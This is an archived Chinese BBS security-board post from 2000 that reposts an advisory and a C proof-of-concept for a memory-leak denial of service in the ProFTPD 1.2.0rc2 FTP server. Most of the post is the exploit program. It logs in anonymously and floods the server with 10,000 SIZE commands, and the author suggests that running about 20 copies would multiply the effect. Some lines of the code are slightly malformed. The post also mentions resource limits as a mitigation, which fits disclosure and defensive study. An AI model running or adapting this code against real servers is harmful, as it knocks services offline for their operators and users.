📄 212.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="196.htm">上一层</a>][<a href="213.htm">下一篇</a>]
<hr><p align="left"><small>:发信人: scz (小四), 信区: Security <br>
:标 题: proftpd测试程序 <br>
:发信站: 武汉白云黄鹤站 (Thu Dec 21 15:33:11 2000), 站内信件 <br>
测试程序 <br>
<br>
<br>
<br>
Piotr Zurawski <br>
<br>
<br>
<br>
This is sample code to demonstrate effects of memory leak in <br>
<br>
ProFTPD daemon. As far as I know all available versions up to date <br>
<br>
(19.12.2000) are vulnerable to this. <br>
<br>
<br>
<br>
This bug is not dangerous, if you run one instance of included code. <br>
<br>
But wonder, what will happen, if someone will run about 20 sessions... <br>
<br>
<br>
Wojciech Purczynski reported, that memory leak exists also, when other <br>
<br>
FTP commands are invoked (eg. STAT). <br>
<br>
Of course daemon will consume only as much, as it's defined in limits <br>
<br>
of th user, daemon runs as. If you use setrlimit()in source, pam, or <br>
<br>
ulimit before you start the daemon, this probably won't hurt so much. <br>
<br>
<br>
<br>
Piotr Zurawski [fb] <br>
<br>
szur@ix.renet.pl <br>
<br>
<br>
<br>
/* Proftpd DoS <br>
<br>
* by Piotr Zurawski (szur@ix.renet.pl) <br>
<br>
<br>
* This source is just an example of memory leakage in proftpd-1.2.0(rc2) <br>
<br>
* server discovered by Wojciech Purczynski. <br>
<br>
*/ <br>
<br>
<br>
<br>
#include <stdio.h> <br>
<br>
#include <unistd.h> <br>
<br>
#include <stdlib.h> <br>
<br>
#include <signal.h> <br>
<br>
#include <time.h> <br>
<br>
#include <string.h> <br>
<br>
#include <ctype.h> <br>
<br>
<br>
#include <sys/types.> <br>
<br>
#include <sys/socket.h> <br>
<br>
#include <netinet/in.h> <br>
<br>
#include <arpa/inet.h> <br>
<br>
#include <arpa/nameser.h> <br>
<br>
#include <netdb.h> <br>
<br>
<br>
<br>
#define USERNAME "anonymous" <br>
<br>
#define PASSWORD "dupa@dupa.pl" <br>
<br>
#define HOWMANY 10000 <br>
<br>
<br>
<br>
<br>
void logintoftp(); <br>
<br>
void sendsizes(); <br>
<br>
int fd; <br>
<br>
struct in_addr host; <br>
<br>
unsigned short port = 21; <br>
<br>
int tcp_connect(struct in_addr addr,unsigned short port); <br>
<br>
<br>
<br>
int main(int argc, char **argv) <br>
<br>
{ <br>
<br>
<br>
<br>
if (!resolve(argv[1],&host)) <br>
<br>
<br>
{ <br>
<br>
fprintf(stderr,"Hostname lookup failure\n"); <br>
<br>
exit(0); <br>
<br>
} <br>
<br>
<br>
<br>
fd=tcp_connect(host,port); <br>
<br>
<br>
<br>
<br>
<br>
logintoftp(fd); <br>
<br>
<br>
<br>
printf("Logged\n"); <br>
<br>
<br>
<br>
<br>
sendsizes(fd); <br>
<br>
<br>
<br>
printf("Now check out memory usage of proftpd daemon"); <br>
<br>
printf("Resident set size (RSS) and virtual memory size (VSIZE)"); <br>
<br>
printf("fields in ps output"); <br>
<br>
} <br>
<br>
<br>
<br>
void logintoftp() <br>
<br>
{ <br>
<br>
<br>
<br>
<br>
char snd[1024], rcv[1024]; <br>
<br>
int n; <br>
<br>
<br>
<br>
printf("Logging " USERNAME "/" PASSWORD "\r\n"); <br>
<br>
<br>
<br>
memset(snd, '\0', 1024); <br>
<br>
sprintf(snd, "USER %s\r\n", USERNAME); <br>
<br>
write(fd, snd, strlen(snd)); <br>
<br>
<br>
<br>
while((n=read(fd, rcv, sizeof(rcv))) > 0) <br>
<br>
{ <br>
<br>
<br>
rcv[n] = 0; <br>
<br>
if(strchr(rcv, '\n') != NULL)break; <br>
<br>
} <br>
<br>
<br>
<br>
memset(snd, '\0', 1024); <br>
<br>
sprintf(snd, "PASS %s\r\n", PASSWORD); <br>
<br>
write(fd, snd, strlen(snd)); <br>
<br>
<br>
<br>
while((n=read(fd, rcv, sizeof(rcv))) > 0) <br>
<br>
{ <br>
<br>
rcv[n] = 0; <br>
<br>
<br>
if(strchr(rcv, '\n') != NULL) <br>
<br>
break; <br>
<br>
} <br>
<br>
return; <br>
<br>
} <br>
<br>
<br>
<br>
void sendsizes() <br>
<br>
{ <br>
<br>
char snd[1024], rcv[1024]; <br>
<br>
unsigned long loop; <br>
<br>
<br>
<br>
<br>
printf ("Sending %i size commands... \n", HOWMANY); <br>
<br>
<br>
<br>
for(loop=0;loop<HOWMANY;loop++) <br>
<br>
{ <br>
<br>
sprintf(snd, "SIZE /dadasjasojdasj/adhjaodhahasohasaoihroaha"); <br>
<br>
write(fd, snd,strlen(snd)); <br>
<br>
} <br>
<br>
<br>
<br>
return; <br>
<br>
} <br>
<br>
<br>
<br>
<br>
int tcp_connect(struct in_addr addr,unsigned short port) <br>
<br>
{ <br>
<br>
int fd; <br>
<br>
<br>
<br>
struct sockaddr_in serv; <br>
<br>
bzero(&serv,sizeof(serv)); serv.sin_addr=addr; <br>
<br>
serv.sin_port=htons(port); <br>
<br>
serv.sin_family=AF_INET; <br>
<br>
<br>
<br>
if ((fd=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) < 0)\ <br>
<br>
{ <br>
<br>
<br>
perror("socket"); <br>
<br>
exit(0); <br>
<br>
} <br>
<br>
<br>
<br>
if (connect(fd,(struct sockaddr *)&serv,sizeof(serv)) < 0) <br>
<br>
{ <br>
<br>
perror("connect"); <br>
<br>
exit(0); <br>
<br>
} <br>
<br>
<br>
<br>
return(fd); <br>
<br>
} <br>
<br>
<br>
<br>
int resolve(char *hostname,struct in_addr *addr) <br>
<br>
{ <br>
<br>
struct hostent*res; <br>
<br>
res=gethostbyname(hostname); <br>
<br>
if (res==NULL) <br>
<br>
return(0); <br>
<br>
memcpy((char *)addr,res->h_addr,res->h_length); <br>
return(1); <br>
} <br>
<br>
-- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="196.htm">上一层</a>][<a href="213.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -